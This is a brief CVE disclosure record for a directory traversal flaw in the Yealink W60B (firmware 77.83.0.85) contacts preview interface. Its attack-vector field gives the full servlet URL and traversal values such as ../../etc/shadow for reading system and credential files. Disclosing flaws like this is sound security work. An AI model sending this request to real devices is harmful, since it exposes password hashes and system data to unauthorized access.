CVE-2020-24113
[Vulnerability Type]
Directory Traversal
[Affected Component]
Contacts file upload interface
[Attack Type]
Context-dependent
[Impact Denial of Service]
true
[Impact Information Disclosure]
true
[Attack Vectors]
You go to https://{IP}/servlet?m=mod_data&p=contacts-preview&q=load&handsetid=7&filename={file} and substitute the {file} parameter with the file you want to read, i.e. ../../etc/shadow or ../../proc/cpuinfo
[Discoverer]
fuomag9
[Reference]
[Vendor of Product]
Yealink
[Affected Product Code Base]
Yealink W60B 77.83.0.85